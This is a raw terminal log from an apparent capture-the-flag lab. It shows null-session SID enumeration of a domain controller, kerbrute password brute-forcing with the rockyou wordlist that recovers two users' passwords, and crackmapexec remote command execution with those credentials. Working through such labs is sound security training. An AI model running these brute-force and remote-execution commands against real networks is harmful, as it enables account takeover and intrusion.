S-1-5-21-518050695-217262318-2335301019-509 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-510 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-511 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-512 TEST\Domain Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-513 TEST\Domain Users (Domain Group)
S-1-5-21-518050695-217262318-2335301019-514 TEST\Domain Guests (Domain Group)
S-1-5-21-518050695-217262318-2335301019-515 TEST\Domain Computers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-516 TEST\Domain Controllers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-517 TEST\Cert Publishers (Local Group)
S-1-5-21-518050695-217262318-2335301019-518 TEST\Schema Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-519 TEST\Enterprise Admins (Domain Group)
S-1-5-21-518050695-217262318-2335301019-520 TEST\Group Policy Creator Owners (Domain Group)
S-1-5-21-518050695-217262318-2335301019-521 TEST\Read-Only Domain Controllers (Domain Group)
S-1-5-21-518050695-217262318-2335301019-522 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-523 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-524 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-525 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-526 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-527 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-528 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-529 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-530 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-531 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-532 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-533 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-534 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-535 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-536 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-537 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-538 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-539 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-540 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-541 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-542 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-543 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-544 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-545 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-546 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-547 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-548 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-549 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-550 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1000 TEST\AD1$ (Local User)
S-1-5-21-518050695-217262318-2335301019-1001 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1002 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1003 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1004 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1005 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1006 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1007 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1008 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1009 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1010 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1011 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1012 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1013 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1014 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1015 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1016 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1017 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1018 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1019 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1020 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1021 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1022 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1023 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1024 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1025 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1026 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1027 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1028 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1029 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1030 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1031 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1032 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1033 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1034 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1035 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1036 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1037 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1038 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1039 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1040 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1041 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1042 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1043 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1044 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1045 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1046 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1047 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1048 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1049 *unknown*\*unknown* (8)
S-1-5-21-518050695-217262318-2335301019-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 *unknown*\*unknown* (8)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)


 ============================================ 
|    Getting printer info for 172.16.0.20    |
 ============================================ 
No printers returned.


enum4linux complete on Thu Feb 13 16:35:40 2020


 root@kali  ~/ctf/pentestitlab14            


 root@kali  /opt/kerbrute/dist   master v1.0.3 ./kerbrute_linux_amd64 bruteuser --dc 172.16.0.20 -d test.lab /usr/share/wordlists/rockyou.txt sidorov -t 200                      1 ↵ ⚡ 3612 18:40:36


    __             __   __     
   / /_____  _____/ /_ _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ / / /_/ / /  / /_/ / /_/ __/
/_/|_|\___/_/  /_.___/_/ \__,_/\__/\___/                                        


Version: dev (9dad6e1) - 02/13/20 - Ronnie Flathers @ropnop


2020/02/13 18:40:52 >  Using KDC(s):
2020/02/13 18:40:52 >  172.16.0.20:88


2020/02/13 18:41:23 >  [+] VALID LOGIN: sidorov@test.lab:1234qwer
2020/02/13 18:41:26 >  Done! Tested 3277 logins (1 successes) in 34.014 seconds
 root@kali  /opt/kerbrute/dist   master v1.0.3                
 root@kali  ~/ctf/pentestitlab14/vpn2  smbclient -L 172.16.0.20 -U 'sidorov@test.lab' -p 1234qwer                                                                               
Enter sidorov@test.lab's password: 


Sharename       Type Comment
---------       ---- -------
netlogon        Disk      
sysvol          Disk      
IPC$            IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
 root@kali  ~/ctf/pentestitlab14/vpn2            


 root@kali  ~/ctf/pentestitlab14  crackmapexec smb 172.16.0.20 -u 'sidorov@test.lab'  -p 1234qwer -x whoami                                                                   
SMB         172.16.0.20     445 DC2         [*] Windows 6.1 (name:DC2) (domain:TEST) (signing:True) (SMBv1:True)
SMB         172.16.0.20     445 DC2         [+] TEST\sidorov@test.lab:1234qwer 
 root@kali  ~/ctf/pentestitlab14             


 root@kali  /opt/kerbrute/dist   master v1.0.3 ./kerbrute_linux_amd64 bruteuser --dc 172.16.0.20 -d test.lab /usr/share/wordlists/rockyou.txt petrov -t 200                         ✔ ⚡ 3676 19:10:47


    __             __   __     
   / /_____  _____/ /_ _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ / / /_/ / /  / /_/ / /_/ __/
/_/|_|\___/_/  /_.___/_/ \__,_/\__/\___/                                        


Version: dev (9dad6e1) - 02/13/20 - Ronnie Flathers @ropnop


2020/02/13 19:10:56 >  Using KDC(s):
2020/02/13 19:10:56 >  172.16.0.20:88


2020/02/13 19:12:16 >  [+] VALID LOGIN: petrov@test.lab:P@ssw0rd
2020/02/13 19:12:20 >  Done! Tested 8182 logins (1 successes) in 83.873 seconds
 root@kali  /opt/kerbrute/dist   master v1.0.3      


 root@kali  ~/ctf/pentestitlab14  smbclient -L 172.16.0.20 -U 'petrov@test.lab'                                                                                                        ✔ ⚡ 3747 19:18:44
Enter petrov@test.lab's password: 


Sharename       Type Comment
---------       ---- -------
netlogon        Disk      
sysvol          Disk      
IPC$            IPC IPC Service (Samba 4.5.16-Debian)
SMB1 disabled -- no workgroup available
 root@kali  ~/ctf/pentestitlab14  cme smb 172.16.0.20 -u 'petrov@test.lab'  -p 'P@ssw0rd' -x whoami                                                                 ✔ ⚡ 3748 19:20:36
CME          172.16.0.20:445 DC2             [*] Windows 6.1 Build 0 (name:DC2) (domain:TEST)
CME          172.16.0.20:445 DC2             [+] TEST\petrov@test.lab:P@ssw0rd 
[*] KTHXBYE!
 root@kali  ~/ctf/pentestitlab14     

Idź do oryginalnego materiału